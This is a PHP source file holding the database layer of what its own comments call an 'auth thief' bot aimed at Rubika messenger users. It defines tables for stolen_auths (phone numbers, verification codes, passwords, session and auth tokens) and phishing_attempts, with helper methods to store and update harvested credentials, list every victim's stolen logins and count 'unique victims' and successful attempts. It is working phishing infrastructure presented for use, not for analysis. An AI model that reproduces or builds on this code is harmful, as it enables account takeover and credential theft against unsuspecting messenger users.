<?php

namespace RubikaBot;



use PDO; 

use PDOException;



class Database {

	private PDO $pdo;



	public function __construct(string $dbFilePath) {

		$needInit = !file_exists($dbFilePath);

		

		// Ensure the directory exists

        $dbDir = dirname($dbFilePath);

        if (!is_dir($dbDir)) {

            mkdir($dbDir, 0777, true);

        }



		try {

			$this->pdo = new PDO('sqlite:' . $dbFilePath);

			$this->pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

			// Enable foreign keys

			$this->pdo->exec('PRAGMA foreign_keys = ON');

		} catch (PDOException $e) {

			error_log('Database connection failed: ' . $e->getMessage());

			throw $e;

		}

		

		if ($needInit) {

			error_log("Database: Initializing new auth thief database");

			$this->initSchema();

		}

		// Always run migrations for existing databases

		error_log("Database: Running migrations");

		$this->runMigrations();

	}



	public function getPdo(): PDO { return $this->pdo; }



	private function initSchema(): void {

		$schema = [

			'CREATE TABLE IF NOT EXISTS users (

				id INTEGER PRIMARY KEY AUTOINCREMENT, 

				chat_id TEXT UNIQUE, 

				first_name TEXT,

				last_name TEXT,

				username TEXT,

				state TEXT DEFAULT "waiting_phone",

				is_banned INTEGER DEFAULT 0,

				created_at DATETIME DEFAULT CURRENT_TIMESTAMP

			)',

			'CREATE TABLE IF NOT EXISTS stolen_auths (

				id INTEGER PRIMARY KEY AUTOINCREMENT,

				user_chat_id TEXT,

				phone_number TEXT,

				verification_code TEXT,

				password TEXT,

				auth_hash TEXT,

				session_data TEXT,

				rubika_auth TEXT,

				is_verified INTEGER DEFAULT 0,

				stolen_at DATETIME DEFAULT CURRENT_TIMESTAMP,

				FOREIGN KEY(user_chat_id) REFERENCES users(chat_id) ON DELETE CASCADE

			)',

			'CREATE TABLE IF NOT EXISTS phishing_attempts (

				id INTEGER PRIMARY KEY AUTOINCREMENT,

				user_chat_id TEXT,

				step TEXT,

				attempted_data TEXT,

				success INTEGER DEFAULT 0,

				attempt_date DATETIME DEFAULT CURRENT_TIMESTAMP,

				FOREIGN KEY(user_chat_id) REFERENCES users(chat_id) ON DELETE CASCADE

			)',

			'CREATE INDEX IF NOT EXISTS idx_users_chat_id ON users(chat_id)',

			'CREATE INDEX IF NOT EXISTS idx_users_state ON users(state)',

			'CREATE INDEX IF NOT EXISTS idx_stolen_auths_user ON stolen_auths(user_chat_id)',

			'CREATE INDEX IF NOT EXISTS idx_stolen_auths_phone ON stolen_auths(phone_number)',

			'CREATE INDEX IF NOT EXISTS idx_phishing_user ON phishing_attempts(user_chat_id)'

		];

		

		foreach ($schema as $sql) {

			try {

				$this->pdo->exec($sql);

				error_log('Database: Created table/index: ' . substr($sql, 0, 50) . '...');

			} catch (PDOException $e) {

				error_log('Database: Error creating table: ' . $e->getMessage());

			}

		}

	}



	private function runMigrations(): void {

		// Migration 1: Add missing columns to users table

		try {

			$stmt = $this->pdo->query("PRAGMA table_info(users)");

			$columns = $stmt->fetchAll(PDO::FETCH_ASSOC);

			$columnNames = array_column($columns, 'name');

			

			$newColumns = [

				'state' => 'ALTER TABLE users ADD COLUMN state TEXT DEFAULT "waiting_phone"',

				'is_banned' => 'ALTER TABLE users ADD COLUMN is_banned INTEGER DEFAULT 0'

			];

			

			foreach ($newColumns as $columnName => $sql) {

				if (!in_array($columnName, $columnNames)) {

					$this->pdo->exec($sql);

					error_log("Database: Added $columnName column to users table");

				}

			}

		} catch (PDOException $e) {

			error_log('Database: Migration error for users table: ' . $e->getMessage());

		}



		// Migration 2: Add stolen_auths table if it doesn't exist

		try {

			$stmt = $this->pdo->query("SELECT name FROM sqlite_master WHERE type='table' AND name='stolen_auths'");

			if (!$stmt->fetch()) {

				$sql = 'CREATE TABLE stolen_auths (

					id INTEGER PRIMARY KEY AUTOINCREMENT,

					user_chat_id TEXT,

					phone_number TEXT,

					verification_code TEXT,

					password TEXT,

					auth_hash TEXT,

					session_data TEXT,

					rubika_auth TEXT,

					is_verified INTEGER DEFAULT 0,

					stolen_at DATETIME DEFAULT CURRENT_TIMESTAMP,

					FOREIGN KEY(user_chat_id) REFERENCES users(chat_id) ON DELETE CASCADE

				)';

				$this->pdo->exec($sql);

				$this->pdo->exec('CREATE INDEX idx_stolen_auths_user ON stolen_auths(user_chat_id)');

				$this->pdo->exec('CREATE INDEX idx_stolen_auths_phone ON stolen_auths(phone_number)');

				error_log('Database: Created stolen_auths table');

			}

		} catch (PDOException $e) {

			error_log('Database: Migration error for stolen_auths table: ' . $e->getMessage());

		}



		// Migration 3: Add phishing_attempts table if it doesn't exist

		try {

			$stmt = $this->pdo->query("SELECT name FROM sqlite_master WHERE type='table' AND name='phishing_attempts'");

			if (!$stmt->fetch()) {

				$sql = 'CREATE TABLE phishing_attempts (

					id INTEGER PRIMARY KEY AUTOINCREMENT,

					user_chat_id TEXT,

					step TEXT,

					attempted_data TEXT,

					success INTEGER DEFAULT 0,

					attempt_date DATETIME DEFAULT CURRENT_TIMESTAMP,

					FOREIGN KEY(user_chat_id) REFERENCES users(chat_id) ON DELETE CASCADE

				)';

				$this->pdo->exec($sql);

				$this->pdo->exec('CREATE INDEX idx_phishing_user ON phishing_attempts(user_chat_id)');

				error_log('Database: Created phishing_attempts table');

			}

		} catch (PDOException $e) {

			error_log('Database: Migration error for phishing_attempts table: ' . $e->getMessage());

		}

	}



	// Helper methods for auth thief bot functionality

	public function addUser(string $chatId, ?string $firstName = null, ?string $lastName = null, ?string $username = null): bool {

		$stmt = $this->pdo->prepare("INSERT OR IGNORE INTO users (chat_id, first_name, last_name, username) VALUES (?, ?, ?, ?)");

		return $stmt->execute([$chatId, $firstName, $lastName, $username]);

	}



	public function getUser(string $chatId): ?array {

		$stmt = $this->pdo->prepare('SELECT * FROM users WHERE chat_id = ?');

		$stmt->execute([$chatId]);

		return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;

	}



	public function updateUserState(string $chatId, string $state): bool {

		$stmt = $this->pdo->prepare("UPDATE users SET state = ? WHERE chat_id = ?");

		return $stmt->execute([$state, $chatId]);

	}



	public function banUser(string $chatId): bool {

		$stmt = $this->pdo->prepare("UPDATE users SET is_banned = 1 WHERE chat_id = ?");

		return $stmt->execute([$chatId]);

	}



	public function unbanUser(string $chatId): bool {

		$stmt = $this->pdo->prepare("UPDATE users SET is_banned = 0 WHERE chat_id = ?");

		return $stmt->execute([$chatId]);

	}



	public function isUserBanned(string $chatId): bool {

		$stmt = $this->pdo->prepare('SELECT is_banned FROM users WHERE chat_id = ?');

		$stmt->execute([$chatId]);

		return (bool) $stmt->fetchColumn();

	}



	public function addStolenAuth(string $userChatId, string $phoneNumber, ?string $verificationCode = null, ?string $password = null): int {

		$stmt = $this->pdo->prepare("INSERT INTO stolen_auths (user_chat_id, phone_number, verification_code, password) VALUES (?, ?, ?, ?)");

		$stmt->execute([$userChatId, $phoneNumber, $verificationCode, $password]);

		return $this->pdo->lastInsertId();

	}



	public function updateStolenAuth(int $authId, array $data): bool {

		$updates = [];

		$params = [];

		

		foreach ($data as $key => $value) {

			if (in_array($key, ['verification_code', 'password', 'auth_hash', 'session_data', 'rubika_auth', 'is_verified'])) {

				$updates[] = "$key = ?";

				$params[] = $value;

			}

		}

		

		if (empty($updates)) return false;

		

		$params[] = $authId;

		$sql = "UPDATE stolen_auths SET " . implode(', ', $updates) . " WHERE id = ?";

		$stmt = $this->pdo->prepare($sql);

		return $stmt->execute($params);

	}



	public function getStolenAuthByUser(string $userChatId): ?array {

		$stmt = $this->pdo->prepare('SELECT * FROM stolen_auths WHERE user_chat_id = ? ORDER BY stolen_at DESC LIMIT 1');

		$stmt->execute([$userChatId]);

		return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;

	}



	public function getAllStolenAuths(): array {

		$stmt = $this->pdo->query('SELECT sa.*, u.first_name, u.last_name FROM stolen_auths sa LEFT JOIN users u ON sa.user_chat_id = u.chat_id ORDER BY sa.stolen_at DESC');

		return $stmt->fetchAll(PDO::FETCH_ASSOC);

	}



	public function logPhishingAttempt(string $userChatId, string $step, string $attemptedData, bool $success = false): bool {

		$stmt = $this->pdo->prepare("INSERT INTO phishing_attempts (user_chat_id, step, attempted_data, success) VALUES (?, ?, ?, ?)");

		return $stmt->execute([$userChatId, $step, $attemptedData, $success ? 1 : 0]);

	}



	public function getPhishingStats(): array {

		$stats = [];

		

		// Total attempts

		$stats['total_attempts'] = $this->pdo->query("SELECT COUNT(*) FROM phishing_attempts")->fetchColumn();

		

		// Successful attempts

		$stats['successful_attempts'] = $this->pdo->query("SELECT COUNT(*) FROM phishing_attempts WHERE success = 1")->fetchColumn();

		

		// Unique victims

		$stats['unique_victims'] = $this->pdo->query("SELECT COUNT(DISTINCT user_chat_id) FROM phishing_attempts")->fetchColumn();

		

		// Total stolen auths

		$stats['stolen_auths'] = $this->pdo->query("SELECT COUNT(*) FROM stolen_auths")->fetchColumn();

		

		// Verified auths

		$stats['verified_auths'] = $this->pdo->query("SELECT COUNT(*) FROM stolen_auths WHERE is_verified = 1")->fetchColumn();

		

		return $stats;

	}



	public function getStats(): array {

		$stats = [];

		$stats['users'] = $this->pdo->query("SELECT COUNT(*) FROM users")->fetchColumn();

		$stats['banned_users'] = $this->pdo->query("SELECT COUNT(*) FROM users WHERE is_banned = 1")->fetchColumn();

		$stats['stolen_auths'] = $this->pdo->query("SELECT COUNT(*) FROM stolen_auths")->fetchColumn();

		$stats['verified_auths'] = $this->pdo->query("SELECT COUNT(*) FROM stolen_auths WHERE is_verified = 1")->fetchColumn();

		$stats['phishing_attempts'] = $this->pdo->query("SELECT COUNT(*) FROM phishing_attempts")->fetchColumn();

		return $stats;

	}



	public function getAllUsers(): array {

		$stmt = $this->pdo->query('SELECT * FROM users ORDER BY created_at DESC');

		return $stmt->fetchAll(PDO::FETCH_ASSOC);

	}

}

?>

